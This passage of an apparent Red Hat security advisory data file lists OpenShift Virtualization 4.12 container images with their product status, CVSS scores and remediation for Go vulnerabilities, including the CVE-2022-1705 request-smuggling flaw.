"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: don't close fd 0 on ForkExec error", }, { cve: "CVE-2022-1705", cwe: { id: "CWE-444", name: "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107374", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating \"chunked\" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: improper sanitization of Transfer-Encoding header", title: "Vulnerability summary", }, { category: "other", text: "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nThe platform uses secure, encrypted HTTPS connections over TLS 1.2 to reduce the risk of smuggling attacks by preventing the injection of ambiguous or malformed requests between components. The environment employs IPS/IDS and antimalware solutions to detect and block malicious code while ensuring consistent interpretation of HTTP requests across network layers, mitigating request/response inconsistencies. Event logs are collected and analyzed for centralization, correlation, monitoring, alerting, and retention, enabling the detection of malformed or suspicious HTTP traffic. Static code analysis and peer reviews enforce strong input validation and error handling to ensure all user inputs adhere to HTTP protocol specifications.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1705", }, { category: "external", summary: "RHBZ#2107374", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1705", url: "https://www.cve.org/CVERecord?id=CVE-2022-1705", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1705", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1705", }, { category: "external", summary: "https://go.dev/issue/53188", url: "https://go.dev/issue/53188", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", 